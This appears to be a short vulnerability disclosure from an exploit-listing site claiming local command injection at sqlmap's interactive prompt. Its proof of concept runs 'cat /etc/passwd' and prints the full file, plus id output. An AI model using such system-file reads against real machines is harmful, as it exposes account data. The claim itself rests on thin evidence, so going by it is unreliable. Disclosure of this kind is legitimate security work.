SQLmap - Command Injection

2020.02.11

Mizaru (FR)

Risk: Low

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

# Exploit Title: SQLmap - Command Injection
# Google Dork: Nope :(
# Date: 20 January 16:02
# Author: Mizaru
# Vendor Homepage: https://sqlmap.org
# Software Link: https://github.com/sqlmapproject/sqlmap
# Version: Last Version
# Tested on: ParrotSec & Windows 10
# CVE : Nope :(

The vulnerability happend when you want to choose an option
Yes, the sqlmap program execute command.

PoC:
   -> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] lol
      ->    bash: lol : commande introuvable
      
  If you understand french langage, you see that the program execute an bash command.
  So if we test to do an real command, what happen ?
  
  -> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] cat /etc/passwd
        root:x:0:0:root:/root:/bin/bash
        daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
        bin:x:2:2:bin:/bin:/usr/sbin/nologin
        sys:x:3:3:sys:/dev:/usr/sbin/nologin
        sync:x:4:65534:sync:/bin:/bin/sync
        games:x:5:60:games:/usr/games:/usr/sbin/nologin
        man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
        lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
        mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
        news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
        uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
        proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
        www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
        backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
        list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
        irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
        gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
        nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
        _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
        systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
        systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
        systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
        mysql:x:104:109:MySQL Server,,,:/nonexistent:/bin/false
        freerad:x:105:110::/etc/freeradius:/usr/sbin/nologin
        Debian-exim:x:106:111::/var/spool/exim4:/usr/sbin/nologin
        debian-tor:x:107:112::/var/lib/tor:/bin/false
        uuidd:x:108:115::/run/uuidd:/usr/sbin/nologin
        rwhod:x:109:65534::/var/spool/rwho:/usr/sbin/nologin
        redsocks:x:110:116::/var/run/redsocks:/usr/sbin/nologin
        shellinabox:x:111:117:Shell In A Box,,,:/var/lib/shellinabox:/usr/sbin/nologin
        postgres:x:112:118:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
        usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
        redis:x:114:120::/var/lib/redis:/usr/sbin/nologin
        miredo:x:115:65534::/var/run/miredo:/usr/sbin/nologin
        ntp:x:116:121::/nonexistent:/usr/sbin/nologin
        stunnel4:x:117:122::/var/run/stunnel4:/usr/sbin/nologin
        dnsmasq:x:118:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
        messagebus:x:119:123::/nonexistent:/usr/sbin/nologin
        iodine:x:120:65534::/var/run/iodine:/usr/sbin/nologin
        arpwatch:x:121:125:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh
        sslh:x:122:130::/nonexistent:/usr/sbin/nologin
        sshd:x:123:65534::/run/sshd:/usr/sbin/nologin
        rtkit:x:124:131:RealtimeKit,,,:/proc:/usr/sbin/nologin
        avahi:x:125:133:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
        inetsim:x:126:134::/var/lib/inetsim:/usr/sbin/nologin
        gluster:x:127:136::/var/lib/glusterd:/usr/sbin/nologin
        colord:x:128:137:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
        saned:x:129:139::/var/lib/saned:/usr/sbin/nologin
        geoclue:x:130:141::/var/lib/geoclue:/usr/sbin/nologin
        pulse:x:131:142:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
        king-phisher:x:132:145::/var/lib/king-phisher:/usr/sbin/nologin
        lightdm:x:133:146:Light Display Manager:/var/lib/lightdm:/bin/false
        dradis:x:134:147::/var/lib/dradis:/usr/sbin/nologin
        beef-xss:x:135:148::/var/lib/beef-xss:/usr/sbin/nologin
        i2psvc:x:136:149::/var/lib/i2p:/usr/sbin/nologin
        l0uky:x:1000:1000:0xL0uky,,,:/home/l0uky:/bin/bash
        systemd-coredump:x:999:999:systemd Core Dumper:/:/sbin/nologin
        
        
        
But we can do an id/whoami for see what user we execute this command

    -> uid=1000(l0uky) gid=1000(l0uky) groupes=1000(l0uky),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(debian-tor),124(bluetooth),135(scanner)
    
    So you can see, the command was execute with the user who executed sqlmap :)
    Not too dangerous but must be patched

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SQLmap - Command Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.